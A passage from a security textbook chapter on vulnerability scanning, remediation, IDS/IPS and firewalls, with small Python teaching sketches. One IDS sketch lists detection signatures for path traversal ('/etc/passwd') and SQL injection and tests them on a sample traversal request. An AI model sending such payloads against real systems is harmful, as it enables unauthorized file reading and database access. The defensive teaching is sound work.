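The following Python sketch (with illustrative thresholds, not prescribed values) shows how answers to the recovery questions above might be turned into an essential/required/nonessential rating:

def classify_criticality(recoverable, max_downtime_hours):
    """Rate a data set using the recovery questions from the text."""
    if not recoverable:
        return "essential"   # unrecoverable data warrants the highest rating
    if max_downtime_hours < 24:
        return "essential"   # even brief unavailability halts the business
    if max_downtime_hours < 24 * 7:
        return "required"    # operations continue for a predetermined period
    return "nonessential"    # the organization can operate without it

print(classify_criticality(True, 4))        # essential
print(classify_criticality(True, 24 * 30))  # nonessential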
Active vs. Passive Scanning
Network vulnerability scans probe a targeted system or
network to identify vulnerabilities. The tools used in this
type of scan contain a database of known vulnerabilities
and identify whether a specific vulnerability exists on
each device. There are two types of vulnerability
scanning:
• Passive vulnerability scanning: Passive
vulnerability scanning collects information but
doesn’t take any action to block an attack. A
passive vulnerability scanner (PVS) monitors
network traffic at the packet layer to determine
topology, services, and vulnerabilities. It avoids
the instability that can be introduced to a system
by actively scanning for vulnerabilities. PVS tools
analyze the packet stream and look for
vulnerabilities through direct analysis. They are
deployed in much the same way as intrusion
detection systems (IDSs) or packet analyzers. A
PVS can pick a network session that targets a
protected server and monitor it as much as
needed. The biggest benefit of a PVS is its
capability to do its work without impacting the
monitored network. Some examples of PVSs are
the Nessus Network Monitor (formerly Tenable
PVS) and NetScanTools Pro.
• Active vulnerability scanning: Active
vulnerability scanning collects information and
attempts to block the attack. Whereas passive
scanners can only gather information, active
vulnerability scanners (AVSs) can take action to
block an attack, such as blocking a dangerous IP
address. AVSs can also be used to simulate an
attack to assess readiness. They operate by
sending transmissions to nodes and examining
the responses. Because of this, these scanners may
disrupt network traffic. Examples include Nessus
Professional and OpenVAS.
Regardless of whether it’s active or passive, a
vulnerability scanner cannot replace the expertise of
trained security personnel. Moreover, these scanners are
only as effective as the signature databases on which they
depend, so the databases must be updated regularly.
Finally, because scanners require bandwidth, they
potentially slow the network. For best performance, you
can place a vulnerability scanner in a subnet that needs
to be protected. You can also connect a scanner through
a firewall to multiple subnets; this complicates the
configuration and requires opening ports on the firewall,
which could be problematic and could impact the
performance of the firewall.
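At its simplest, an active scan is just a probe and a response. The following Python sketch, using only the standard library, performs a basic TCP connect test against a few ports. It is nothing like a full scanner such as Nessus or OpenVAS, and this kind of probing should be run only against hosts you are authorized to scan:

import socket

def probe(host, ports, timeout=1.0):
    """Actively probe each port with a TCP connect; return the open ones."""
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            if s.connect_ex((host, port)) == 0:  # 0 means the connect succeeded
                open_ports.append(port)
    return open_ports

print(probe("127.0.0.1", [22, 80, 443]))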
Mapping/Enumeration
Vulnerability mapping and enumeration is the process
of identifying and listing vulnerabilities. In Chapter 2,
“Utilizing Threat Intelligence to Support Organizational
Security,” you were introduced to the Common
Vulnerability Scoring System (CVSS). A closely related
concept is the Common Weakness Enumeration (CWE),
a category system for software weaknesses and
vulnerabilities. CWE organizes vulnerabilities into over
600 categories, including classes for buffer overflows,
path/directory tree traversal errors, race conditions,
cross-site scripting, hard-coded passwords, and insecure
random numbers. CWE is only one of a number of
enumerations that are used by Security Content
Automation Protocol (SCAP), a standard that the
security community uses to enumerate software flaws
and configuration issues. SCAP will be covered more
fully in Chapter 14, “Automation Concepts and
Technologies.”
VALIDATION
Scanning results are not always correct. Scanning tools
can make mistakes identifying vulnerabilities. There are
four types of results a scanner can deliver:
• True positive: Occurs when the scanner
correctly identifies a vulnerability. True means the
scanner is correct and positive means it identified
a vulnerability.
• False positive: Occurs when the scanner identifies a vulnerability that does not exist. False means the scanner is incorrect and positive means it identified a vulnerability. A large number of false positives reduces confidence in scanning results.
• True negative: Occurs when the scanner
correctly determines that a vulnerability does not
exist. True means the scanner is correct and
negative means it did not identify a vulnerability.
• False negative: Occurs when the scanner does not identify a vulnerability that actually exists. False means the scanner is wrong and negative means it did not find a vulnerability. This is worse than a false positive because it means that a vulnerability exists that you are unaware of (as the sketch after this list illustrates).
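The following Python sketch (with hypothetical counts) summarizes these four outcomes. Note that false negatives never appear in a scan report; they have to be estimated by other means, such as penetration testing:

results = {"true_positive": 42, "false_positive": 9,
           "true_negative": 880, "false_negative": 3}

# Everything the scanner reports is a positive, true or false.
reported = results["true_positive"] + results["false_positive"]
precision = results["true_positive"] / reported
print(f"Findings reported: {reported}, of which {precision:.0%} are real")
print(f"Missed vulnerabilities (false negatives): {results['false_negative']}")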
REMEDIATION/MITIGATION
When vulnerabilities are identified, security
professionals must take steps to address them. One of
the outputs of a good risk management process is the
prioritization of the vulnerabilities and an assessment of
the impact and likelihood of each. Driven by those
results, security measures (also called controls or
countermeasures) can be put in place to reduce risk.
Let’s look at some issues relevant to vulnerability
mitigation.
Configuration Baseline
A baseline is a floor, or minimum standard, that is required. Configuration baselines are the security settings that are required on devices of various types. These settings should be driven by the results of the vulnerability and risk management processes.
One practice that can make maintaining security simpler
is to create and deploy standard images that have been
secured with security baselines. A security baseline is a
set of configuration settings that provide a floor of
minimum security in the image being deployed.
Security baselines can be controlled through the use of
Group Policy in Windows. These policy settings can be
made in the image and applied to both users and
computers. These settings are refreshed periodically
through a connection to a domain controller and cannot
be altered by the user. It is also quite common for the
deployment image to include all of the most current
operating system updates and patches as well. This
creates consistency across devices and helps prevent
security issues caused by human error in configuration.
When a network makes use of these types of
technologies, the administrators have created a standard
operating environment. The advantages of such an
environment are more consistent behavior of the
network and simpler support issues. Systems should be scanned weekly to detect changes to the baseline.
Security professionals should help guide their
organization through the process of establishing the
security baselines. If an organization implements very
strict baselines, it will provide a higher level of security
but can actually be too restrictive.
If an organization implements a very lax baseline, it will
provide a lower level of security and will likely result in
security breaches. Security professionals should
understand the balance between protecting the
organizational assets and allowing users access and
should work to ensure that both ends of this spectrum
are understood.
Patching
Patch management, or patching, is often seen as a subset
of configuration management. Software patches are
updates released by vendors that either fix functional
issues with or close security loopholes in operating
systems, applications, and versions of firmware that run
on network devices.
To ensure that all devices have the latest patches
installed, you should deploy a formal system to ensure
that all systems receive the latest updates after thorough
testing in a non-production environment. It is impossible
for a vendor to anticipate every possible impact a change
might have on business-critical systems in a network.
The enterprise is responsible for ensuring that patches
do not adversely impact operations.
The patch management life cycle includes the following
steps:
Step 1. Determine the priority of the patches and
schedule the patches for deployment.
Step 2. Test the patches prior to deployment to
ensure that they work properly and do not
cause system or security issues.
Step 3. Install the patches in the live environment.
Step 4. After the patches are deployed, ensure that
they work properly.
Many organizations deploy a centralized patch
management system to ensure that patching is
deployed in a timely manner. With this system,
administrators can test and review all patches before
deploying them to the systems they affect.
Administrators can schedule the updates to occur during
non-peak hours.
Hardening
Another of the ongoing goals of operations security is to
ensure that all systems have been hardened to the extent
that is possible and still provide functionality. The
hardening can be accomplished both on physical and
logical bases. From a logical perspective:
• Remove unnecessary applications.
• Disable unnecessary services.
• Block unrequired ports.
• Tightly control the connecting of external storage
devices and media (if it’s allowed at all).
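One way to verify part of a logical hardening baseline is to compare the ports actually listening on a host against an approved list. The following Python sketch uses the third-party psutil library; the allowlist is hypothetical, and on some operating systems this call requires elevated privileges:

import psutil

ALLOWED_PORTS = {22, 443}  # ports the (hypothetical) baseline says may listen

# List listening TCP sockets and flag any port not in the baseline.
for conn in psutil.net_connections(kind="tcp"):
    if conn.status == psutil.CONN_LISTEN:
        port = conn.laddr.port
        flag = "" if port in ALLOWED_PORTS else "  <-- not in baseline"
        print(f"listening on {conn.laddr.ip}:{port}{flag}")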
Compensating Controls
Not all vulnerabilities can be eliminated. In some cases,
they can only be mitigated. This can be done by
implementing compensating controls (also known as
countermeasures or safeguards) that compensate for a
vulnerability that cannot be completely eliminated by
reducing the potential risk of that vulnerability being
exploited. Three things must be considered when
implementing a compensating control: vulnerability,
threat, and risk. For example, a good compensating
control might be to implement the appropriate access
control list (ACL) and encrypt the data. The ACL protects
the integrity of the data, and the encryption protects the
confidentiality of the data.
Note
For more information on compensating controls, see http://pcidsscompliance.net/overview/what-are-compensating-controls/.
Risk Acceptance
You learned about risk management in Chapter 2. Part of
the risk management process is deciding how to address
a vulnerability. There are several ways to react. Risk
reduction is the process of altering elements of the
organization in response to risk analysis. After an
organization understands its risk, it must determine how
to handle the risk. The following four basic methods are
used to handle risk:
• Risk avoidance: Terminating the activity that
causes a risk or choosing an alternative that is not
as risky
• Risk transfer: Passing on the risk to a third
party, such as an insurance company
• Risk mitigation: Defining the acceptable risk
level the organization can tolerate and reducing
the risk to that level
• Risk acceptance: Understanding and accepting
the level of risk as well as the cost of damages that
can occur
Verification of Mitigation
Once a threat has been remediated, you should verify
that the mitigation has solved the issue. You should also
take steps to ensure that all is back to its normal secure
state. These steps validate that you are finished and can
move on to taking corrective actions with respect to the
lessons learned.
• Patching: In many cases, a threat or an attack is
made possible by missing security patches. You
should update or at least check for updates for a
variety of components. This includes all patches
for the operating system, updates for any
applications that are running, and updates to all
anti-malware software that is installed. While you
are at it, check for any firmware update the device
may require. This is especially true of hardware
security devices such as firewalls, IDSs, and IPSs.
If any routers or switches are compromised, check
for software and firmware updates.
• Permissions: Many times an attacker
compromises a device by altering the permissions,
either in the local database or in entries related to
the device in the directory service server. All
permissions should undergo a review to ensure
that all are in the appropriate state. The
appropriate state might not be the state they were
in before the event. Sometimes you may discover
that although permissions were not set in a
dangerous way prior to an event, they are not
correct. Make sure to check the configuration
database to ensure that settings match prescribed
settings. You should also make changes to the
permissions based on lessons learned during an
event. In that case, ensure that the new settings
undergo a change control review and that any
approved changes are reflected in the
configuration database.
• Scanning: Even after you have taken all steps
described thus far, consider using a vulnerability
scanner to scan the devices or the network of
devices that were affected. Make sure before you
do so that you have updated the scanner so it can
recognize the latest vulnerabilities and threats.
This will help catch any lingering vulnerabilities
that might still be present.
• Verify logging/communication to security
monitoring: To ensure that you will have good
security data going forward, you need to ensure
that all logs related to security are collecting data.
Pay special attention to the manner in which the
logs react when full. With some settings, the log
begins to overwrite older entries with new entries.
With other settings, the service stops collecting
events when the log is full. Security log entries
need to be preserved. This may require manual
archiving of the logs and subsequent clearing of
the logs. Some logs make this possible
automatically, whereas others require a script. If
all else fails, check the log often to assess its state.
Many organizations send all security logs to a
central location. This could be a Syslog server, or
it could be a security information and event
management (SIEM) system. These systems not
only collect all the logs but also use the
information to make inferences about possible
attacks. Having access to all logs enables the
system to correlate all the data from all
responding devices. Regardless of whether you are
logging to a Syslog server or a SIEM system, you
should verify that all communications between the
devices and the central server are occurring
without a hitch. This is especially true if you had
to rebuild the system manually rather than restore
from an image, as there would be more
opportunity for human error in the rebuilding of
the device.
SCANNING PARAMETERS
AND CRITERIA
Scanning is the process of using scanning tools to identify security issues. Typical issues discovered include
missing patches, weak passwords, and insecure
configurations. While types of scanning are covered in
Chapter 4, “Analyzing Assessment Output,” let’s look at
some issues and considerations supporting the process.
Risks Associated with Scanning
Activities
While vulnerability scanning is an advisable and valid
process, there are some risks to note:
• A false sense of security can be introduced because
scans are not error free.
• Many tools rely on a database of known
vulnerabilities and are only as valid as the latest
update.
• Identifying vulnerabilities does not in and of itself
reduce your risk or improve your security.
Vulnerability Feed
Vulnerability feeds are RSS feeds dedicated to the
sharing of information about the latest vulnerabilities.
Subscribing to these feeds can enhance the knowledge of
the scanning team and can keep the team abreast of the
latest issues. For example, the National Vulnerability
Database is the U.S. government repository of standards-based vulnerability management data represented using
the Security Content Automation Protocol (SCAP)
(covered in Chapter 14).
Scope
The scope of a scan defines what will be scanned and
what type of scan will be performed. It defines what
areas of the infrastructure will be scanned, and this part
of the scope should therefore be driven by where the
assets of concern are located. Limiting the scan areas
helps ensure that accidental scanning of assets and
devices not under the direct control of the organization
does not occur (because it could cause legal issues).
Scope might also include times of day when scanning
should not occur.
In the OpenVAS vulnerability scanner, you can set the
scope by setting the plug-ins and the targets. Plug-ins
define the scans to be performed, and targets specify the
machines. Figure 3-1 shows where plug-ins are chosen,
and Figure 3-2 shows where the targets are set.
Figure 3-1 Selecting Plug-ins in OpenVAS
Figure 3-2 Selecting Targets in OpenVAS
Credentialed vs. Non-credentialed
Another decision that needs to be made before
performing a vulnerability scan is whether to perform a
credentialed scan or a non-credentialed scan. A
credentialed scan is a scan that is performed by
someone with administrative rights to the host being
scanned, while a non-credentialed scan is performed
by someone lacking these rights.
Non-credentialed scans generally run faster and require
less setup but do not generate the same quality of
information as a credentialed scan. This is because
credentialed scans can enumerate information from the
host itself, whereas non-credentialed scans can only look
at ports and only enumerate software that will respond
on a specific port. Credentialed scanning also has the
following benefits:
• Operations are executed on the host itself rather
than across the network.
• A more definitive list of missing patches is
provided.
• Client-side software vulnerabilities are uncovered.
• A credentialed scan can read password policies,
obtain a list of USB devices, check antivirus
software configurations, and even enumerate
Bluetooth devices attached to scanned hosts.
Figure 3-3 shows that when you create a new scan policy
in Nessus, one of the available steps is to set credentials.
Here you can see that Windows credentials are chosen as
the type, and the SMB account and password are set.
Figure 3-3 Setting Credentials for a Scan in Nessus
Server-based vs. Agent-based
Vulnerability scanners can use agents that are installed
on the devices, or they can be agentless. While many
vendors argue that using agents is always best, there are
advantages and disadvantages to both, as presented in
Table 3-2.
Table 3-2 Server-Based vs. Agent-Based Scanning
Some scanners can do both agent-based and server-based scanning (also called agentless or sensor-based
scanning). For example, Figure 3-4 shows the Nessus
templates library with both categories of templates
available.
Figure 3-4 Nessus Template Library
Internal vs. External
Scans can be performed from within the network
perimeter or from outside the perimeter. This choice has
a big effect on the results and their interpretation.
Typically the type of scan is driven by what the tester is
looking for. If the tester’s area of interest is
vulnerabilities that can be leveraged from outside the
perimeter to penetrate the perimeter, then an external
scan is in order. In this type of scan, either the sensors
of the appliance are placed outside the perimeter or, in
the case of software running on a device, the device itself
is placed outside the perimeter.
On the other hand, if the tester’s area of interest is
vulnerabilities that exist within the perimeter—that is,
vulnerabilities that could be leveraged by outsiders who
have penetrated the perimeter or by malicious insiders
(your own people)—then an internal scan is indicated.
In this case, either the sensors of the appliance are
placed inside the perimeter or, in the case of software
running on a device, the device itself is placed inside the
perimeter.
Special Considerations
Just as the requirements of the vulnerability
management program were defined in the beginning of
the process, scanning criteria must be settled upon
before scanning begins. This will ensure that the proper
data is generated and that the conditions under which
the data will be collected are well understood. This will
result in a better understanding of the context in which
the data was obtained and better analysis. Some of the
criteria that might be considered are described in the
following sections.
Types of Data
The types of data with which you are concerned should
have an effect on how you run the scan. Many tools offer
the capability to focus on certain types of vulnerabilities
that relate specifically to certain data types.
Technical Constraints
In some cases the scan will be affected by technical
constraints. Perhaps the way in which you have
segmented the network caused you to have to run the
scan multiple times from various locations in the
network. You will also be limited by the technical
capabilities of the scan tool you use.
Workflow
Workflow can also influence the scan. You might be limited to running scans at certain times because scanning negatively affects workflow. While security is important, it isn’t helpful if it detracts from the business processes that keep the organization in business.
Sensitivity Levels
Scanning tools have sensitivity level settings that impact
both the number of results and the tool’s judgment of the
results. Most systems assign a default severity level to
each vulnerability. In some cases, security analysts may
find that certain events that the system is tagging as
vulnerabilities are actually not vulnerabilities but that
the system has mischaracterized them. In other cases, an
event might be a vulnerability but the severity level
assigned is too extreme or not extreme enough. In that
case the analyst can either dismiss the vulnerability,
which means the system stops reporting it, or manually
define a severity level for the event that is more
appropriate. Keep in mind that these systems are not
perfect.
Sensitivity also refers to how deeply a scan probes each
host. Scanning tools have templates that can be used to
perform certain types of scans. These are two of the most
common templates in use:
• Discovery scans: These scans are typically used
to create an asset inventory of all hosts and all
available services.
• Assessment scans: These scans are more
comprehensive than discovery scans and can
identify misconfigurations, malware, application
settings that are against policy, and weak
passwords. These scans have a significant impact
on the scanned device.
Figure 3-5 shows the All Templates page in Nessus, with
scanning templates like the ones just discussed.
Figure 3-5 Scanning Templates in Nessus
Regulatory Requirements
Does the organization operate in an industry that is
regulated? If so, all regulatory requirements must be
recorded, and the vulnerability assessment must be
designed to support all requirements. The following are
some examples of industries in which security
requirements exist:
• Finance (for example, banks and brokerages)
• Medical (for example, hospitals, clinics, and
insurance companies)
• Retail (for example, credit card and customer
information)
Legislation such as the following can affect organizations
operating in these industries:
• Sarbanes-Oxley Act (SOX): The Public
Company Accounting Reform and Investor
Protection Act of 2002, more commonly known as
the Sarbanes-Oxley Act (SOX), affects any
organization that is publicly traded in the United
States. It controls the accounting methods and
financial reporting for the organizations and
stipulates penalties and even jail time for
executive officers who fail to comply with its
requirements.
• Health Insurance Portability and
Accountability Act (HIPAA): HIPAA, also
known as the Kennedy-Kassebaum Act, affects all
healthcare facilities, health insurance companies,
and healthcare clearing houses. It is enforced by
the Office of Civil Rights (OCR) of the Department
of Health and Human Services (HHS). It provides
standards and procedures for storing, using, and
transmitting medical information and healthcare
data. HIPAA overrides state laws unless the state
laws are stricter. This act directly affects the
security of protected health information (PHI).
• Gramm-Leach-Bliley Act (GLBA) of 1999:
The Gramm-Leach-Bliley Act (GLBA) of 1999
affects all financial institutions, including banks,
loan companies, insurance companies, investment
companies, and credit card providers. It provides
guidelines for securing all financial information
and prohibits sharing financial information with
third parties. This act directly affects the security
of personally identifiable information (PII).
• Payment Card Industry Data Security
Standard (PCI DSS): PCI DSS v3.2.1,
released in 2018, is the latest version of the PCI
DSS standard as of this writing. It encourages and
enhances cardholder data security and facilitates
the broad adoption of consistent data security
measures globally. Table 3-3 shows a high-level
overview of the PCI DSS standard.
Table 3-3 High-Level Overview of PCI DSS
Segmentation
Segmentation is the process of dividing a network at
either Layer 2 or Layer 3. When VLANs are used, there is
segmentation at both Layer 2 and Layer 3, and with IP
subnets, there is segmentation at Layer 3. Segmentation
is usually done for one or both of the following reasons:
• To create smaller, less congested subnets
• To create security borders
In either case, segmentation can affect how you conduct
a vulnerability scan. By segmenting critical assets and
resources from less critical systems, you can restrict the
scan to the segments of interest, reducing the time to
conduct a scan while reducing the amount of irrelevant
data. This is not to suggest that you should not scan the
less critical parts of the network; it’s just that you can
adopt a less robust schedule for those scans.
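For Layer 3 segmentation, the arithmetic of dividing an address space is easily illustrated. The following Python sketch uses the standard library ipaddress module to split an illustrative /24 into four /26 subnets:

import ipaddress

# Divide one /24 network into four /26 segments (prefix length + 2 bits).
network = ipaddress.ip_network("10.10.20.0/24")
for subnet in network.subnets(prefixlen_diff=2):
    print(subnet)
# 10.10.20.0/26, 10.10.20.64/26, 10.10.20.128/26, 10.10.20.192/26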
Intrusion Prevention System (IPS), Intrusion
Detection System (IDS), and Firewall Settings
The settings that exist on the security devices will impact the scan and in many cases are the source of a technical constraint, as mentioned earlier. Scans might be restricted by firewall settings, and the scan can cause alerts to be generated by your intrusion devices. Let’s talk a bit more
about these devices.
Vulnerability scanners are not the only tools used to
identify vulnerabilities. The following systems should
also be implemented as a part of a comprehensive
solution.
IDS/IPS
While you can use packet analyzers to manually monitor
the network for issues during environmental
reconnaissance, a less labor-intensive and more efficient
way to detect issues is through the use of intrusion
detection systems (IDSs) and intrusion prevention
systems (IPSs). An IDS is responsible for detecting
unauthorized access or attacks against systems and
networks. It can verify, itemize, and characterize threats
from outside and inside the network. Most IDSs are
programmed to react in certain ways in specific
situations. Event notification and alerts are crucial to an
IDS. They inform administrators and security
professionals when and where attacks are detected. IDS
implementations are further divided into the following
categories:
• Signature based: This type of IDS analyzes traffic and compares it to attack or state patterns, called signatures, that reside within the IDS database. This type of IDS is also referred to as a misuse-detection system (a minimal matching sketch follows this list). Although this type of IDS is very popular, it can only recognize attacks that match signatures in its database and is only as effective as the signatures provided. Frequent database updates are necessary. There are two main types of signature-based IDSs:
• Pattern matching: The IDS compares traffic
to a database of attack patterns. The IDS
carries out specific steps when it detects traffic
that matches an attack pattern.
• Stateful matching: The IDS records the
initial operating system state. Any changes to
the system state that specifically violate the
defined rules result in an alert or notification
being sent.
• Anomaly-based: This type of IDS analyzes
traffic and compares it to normal traffic to
determine whether said traffic is a threat. It is also
referred to as a behavior-based, or profile-based,
system. The problem with this type of system is
that any traffic outside expected norms is
reported, resulting in more false positives than
you see with signature-based systems. There are
three main types of anomaly-based IDSs:
• Statistical anomaly-based: The IDS
samples the live environment to record
activities. The longer the IDS is in operation,
the more accurate the profile that is built.
However, developing a profile that does not
have a large number of false positives can be
difficult and time-consuming. Thresholds for
activity deviations are important in this IDS.
Too low a threshold results in false positives,
whereas too high a threshold results in false
negatives.
• Protocol anomaly-based: The IDS has
knowledge of the protocols it will monitor. A
profile of normal usage is built and compared
to activity.
• Traffic anomaly-based: The IDS tracks
traffic pattern changes. All future traffic
patterns are compared to the sample. Changing
the threshold reduces the number of false
positives or negatives. This type of filter is
excellent for detecting unknown attacks, but
user activity might not be static enough to
effectively implement this system.
• Rule or heuristic based: This type of IDS is an
expert system that uses a knowledge base, an
inference engine, and rule-based programming.
The knowledge is configured as rules. The data
and traffic are analyzed, and the rules are applied
to the analyzed traffic. The inference engine uses
its intelligent software to “learn.” When
characteristics of an attack are met, they trigger
alerts or notifications. This is often referred to as
an IF/THEN, or expert, system.
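The following minimal Python sketch illustrates the pattern-matching idea behind a signature-based IDS: payloads are compared against a database of byte patterns. The signatures here are hypothetical, and real systems such as Snort use far richer rule languages:

# Hypothetical signature database: byte pattern -> description.
SIGNATURES = {
    b"/etc/passwd": "possible path traversal",
    b"' OR '1'='1": "possible SQL injection",
}

def match_signatures(payload):
    """Return descriptions for every signature found in the payload."""
    return [desc for pattern, desc in SIGNATURES.items() if pattern in payload]

print(match_signatures(b"GET /../../etc/passwd HTTP/1.1"))
# ['possible path traversal']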
An application-based IDS is a specialized IDS that
analyzes transaction log files for a single application.
This type of IDS is usually provided as part of an
application or can be purchased as an add-on.
An IPS is a system responsible for preventing attacks.
When an attack begins, an IPS takes actions to contain
the attack. An IPS, like an IDS, can be network or host
based. Although an IPS can be signature or anomaly
based, it can also use a rate-based metric that analyzes
the volume of traffic as well as the type of traffic. In most
cases, implementing an IPS is more costly than
implementing an IDS because of the added security
needed to contain attacks compared to the security
needed to simply detect attacks. In addition, running an
IPS is more of an overall performance load than running
an IDS.
HIDS/NIDS
The most common way to classify an IDS is based on its
information source: network based or host based. The
most common IDS, the network-based IDS (NIDS),
monitors network traffic on a local network segment. To
monitor traffic on the network segment, the network
interface card (NIC) must be operating in promiscuous
mode—a mode in which the NIC processes all traffic and
not just the traffic directed to the host. A NIDS can only
monitor the network traffic. It cannot monitor any
internal activity that occurs within a system, such as an
attack against a system that is carried out by logging on
to the system’s local terminal. A NIDS is affected by a
switched network because generally a NIDS monitors
only a single network segment. A host-based IDS (HIDS)
is an IDS that is installed on a single host and protects
only that host.
Firewall Rule-Based and Logs
The network device that perhaps is most connected with
the idea of security is the firewall. Firewalls can be
software programs that are installed over server
operating systems, or they can be appliances that have
their own operating system. In either case, the job of
firewalls is to inspect and control the type of traffic
allowed. Firewalls can be discussed on the basis of their
type and their architecture. They can also be physical
devices or exist in a virtualized environment. The
following sections look at them from all angles.
Firewall Types
When we discuss types of firewalls, we are focusing on
the differences in the way they operate. Some firewalls
make a more thorough inspection of traffic than others.
Usually there is a trade-off between the performance of the
firewall and the type of inspection it performs. A deep
inspection of the contents of each packet results in the
firewall having a detrimental effect on throughput,
whereas a more cursory look at each packet has
somewhat less of an impact on performance. It is
therefore important to carefully select what traffic to
inspect, keeping this trade-off in mind.
Packet-filtering firewalls are the least detrimental to
throughput because they inspect only the header of a
packet for allowed IP addresses or port numbers.
Although even performing this function slows traffic, it
involves only looking at the beginning of the packet and
making a quick allow or disallow decision. Although
packet-filtering firewalls serve an important function,
they cannot prevent many attack types. They cannot
prevent IP spoofing, attacks that are specific to an
application, attacks that depend on packet
fragmentation, or attacks that take advantage of the TCP
handshake. More advanced inspection firewall types are
required to stop these attacks.
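The following Python sketch illustrates why packet filtering is fast but limited: a rule consults only header fields (here, just the destination port) and never the packet contents. The rules and packet are hypothetical:

# First-match rule table; dst_port of None acts as a default (matches anything).
RULES = [
    {"action": "allow", "dst_port": 443},
    {"action": "allow", "dst_port": 80},
    {"action": "deny",  "dst_port": None},  # default deny
]

def filter_packet(packet):
    """Return the action of the first rule whose header fields match."""
    for rule in RULES:
        if rule["dst_port"] in (None, packet["dst_port"]):
            return rule["action"]

print(filter_packet({"src": "203.0.113.7", "dst_port": 23}))  # 'deny'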
Stateful firewalls are aware of the proper functioning of
the TCP handshake, keep track of the state of all
connections with respect to this process, and can
recognize when packets that are trying to enter the
network don’t make sense in the context of the TCP
handshake. For example, a packet should never arrive at
a firewall for delivery and have both the SYN flag and the
ACK flag set unless it is part of an existing handshake
process, and it should be in response to a packet sent
from inside the network with the SYN flag set. This is the
type of packet that the stateful firewall would disallow. A
stateful firewall also has the ability to recognize other
attack types that attempt to misuse this process. It does
this by maintaining a state table about all current
connections and the status of each connection process.
This allows it to recognize any traffic that doesn’t make
sense with the current state of the connection. Of course,
maintaining this table and referencing it cause this
firewall type to have more effect on performance than
does a packet-filtering firewall.
Proxy firewalls actually stand between each connection
from the outside to the inside and make the connection
on behalf of the endpoints. Therefore, there is no direct
connection. The proxy firewall acts as a relay between
the two endpoints. Proxy firewalls can operate at two
different layers of the OSI model.
Circuit-level proxies operate at the session layer (Layer
5) of the OSI model. They make decisions based on the
protocol header and session layer information. Because
they do not do deep packet inspection (at Layer 7, the
application layer), they are considered application
independent and can be used for wide ranges of Layer 7
protocol types. A SOCKS firewall is an example of a
circuit-level proxy firewall. It requires a SOCKS client on
the computers. Many vendors have integrated their
software with SOCKS to make using this type of firewall
easier.
Application-level proxies perform deep packet
inspection. This type of firewall understands the details
of the communication process at Layer 7 for the
application of interest. An application-level firewall
maintains a different proxy function for each protocol.
For example, for HTTP, the proxy can read and filter
traffic based on specific HTTP commands. Operating at
this layer requires each packet to be completely opened
and closed, so this type of firewall has the greatest
impact on performance.
Dynamic packet filtering does not describe a type of
firewall; rather, it describes functionality that a firewall
might or might not possess. When an internal computer
attempts to establish a session with a remote computer,
it places both a source and destination port number in
the packet. For example, if the computer is making a
request of a web server, because HTTP uses port 80, the
destination is port 80. The source computer selects the
source port at random from the numbers available above
the well-known port numbers (that is, above 1023).
Because predicting what that random number will be is
impossible, creating a firewall rule that anticipates and
allows traffic back through the firewall on that random
port is impossible.
A dynamic packet-filtering firewall keeps track of that
source port and dynamically adds a rule to the list to
allow return traffic to that port.
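The following Python sketch illustrates the dynamic rule idea: when an inside host opens an outbound session from a random high port, a temporary entry is recorded so that only the matching return traffic is allowed back in. The data structures are illustrative:

dynamic_rules = set()  # (remote_ip, remote_port, local_port) tuples

def outbound(local_port, remote_ip, remote_port):
    """Record an outbound session so its return traffic can be allowed."""
    dynamic_rules.add((remote_ip, remote_port, local_port))

def inbound_allowed(remote_ip, remote_port, local_port):
    return (remote_ip, remote_port, local_port) in dynamic_rules

outbound(49152, "198.51.100.9", 80)                # client -> web server
print(inbound_allowed("198.51.100.9", 80, 49152))  # True: matching return traffic
print(inbound_allowed("198.51.100.9", 80, 50000))  # False: unsolicited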
A kernel proxy firewall is an example of a fifth-generation firewall. It inspects a packet at every layer of
the OSI model but does not introduce the same
performance hit as an application-level firewall because
it does this at the kernel layer. It also follows the proxy
model in that it stands between the two systems and
creates connections on their behalf.
Firewall Architecture
Whereas the type of firewall speaks to the internal
operation of the firewall, the architecture refers to the
way in which the firewall or firewalls are deployed in the
network to form a system of protection. This section
looks at the various ways firewalls can be deployed and
the names of these various configurations.
A bastion host might or might not be a firewall. The term
actually refers to the position of any device. If it is
exposed directly to the Internet or to any untrusted
network, it is called a bastion host. Whether it is a
firewall, a DNS server, or a web server, all standard
hardening procedures become even more important for
these exposed devices. Any unnecessary services should
be stopped, all unneeded ports should be closed, and all
security patches must be up to date. These procedures
are referred to as “reducing the attack surface.”
A dual-homed firewall is a firewall that has two network
interfaces: one pointing to the internal network and
another connected to the untrusted network. In many
cases, routing between these interfaces is turned off. The
firewall software allows or denies traffic between the two
interfaces, based on the firewall rules configured by the
administrator. The danger of relying on a single dual-homed firewall is that it provides a single point of failure.
If this device is compromised, the network is
compromised also. If it suffers a denial-of-service (DoS)
attack, no traffic can pass. Neither of these is a good
situation. In some cases, a firewall may be multihomed.
One popular type is the three-legged firewall. This
configuration has three interfaces: one connected to the
untrusted network, one to the internal network, and the
last one to a part of the network called a demilitarized
zone (DMZ). A DMZ is a portion of the network where
systems will be accessed regularly from an untrusted
network. These might be web servers or an e-mail server,
for example. The firewall can be configured to control the
traffic that flows between the three networks, but it is
important to be somewhat careful with traffic destined
for the DMZ and to treat traffic to the internal network
with much more suspicion.
Although the firewalls discussed thus far typically
connect directly to an untrusted network (at least one
interface does), a screened host is a firewall that is
between the final router and the internal network. When
traffic comes into the router and is forwarded to the
firewall, it is inspected before going into the internal
network.
A screened subnet takes this concept a step further. In
this case, two firewalls are used, and traffic must be
inspected at both firewalls to enter the internal network.
It is called a screened subnet because there is a subnet
between the two firewalls that can act as a DMZ for
resources from the outside world. In the real world, these
various firewall approaches are mixed and matched to
meet requirements, so you might find elements of all
these architectural concepts applied to a specific
situation.
INHIBITORS TO
REMEDIATION
In some cases, there may be issues that make
implementing a particular solution inadvisable or
impossible. Some of these inhibitors to remediation are
as follows:
• Memorandum of understanding (MOU):
An MOU is a document that, while not legally
binding, indicates a general agreement between
the principals to do something together. An
organization may have MOUs with multiple
organizations, and MOUs may in some instances
contain security requirements that inhibit or
prevent the deployment of certain measures.
• Service-level agreement (SLA): An SLA is a
document that specifies a service to be provided
by a party, the costs of the service, and the
expectations of performance. These contracts may
exist with third parties from outside the
organization and between departments within an
organization. Sometimes these SLAs may include
specifications that inhibit or prevent the
deployment of certain measures.
• Organizational governance: Organizational
governance refers to the process of controlling an
organization’s activities, processes, and
operations. When the process is unwieldy, as it is
in some very large organizations, the application
of countermeasures may be frustratingly slow.
One of the reasons for including upper
management in the entire process is to use the
weight of authority to cut through the red tape.
• Business process interruption: The
deployment of mitigations cannot be done in such
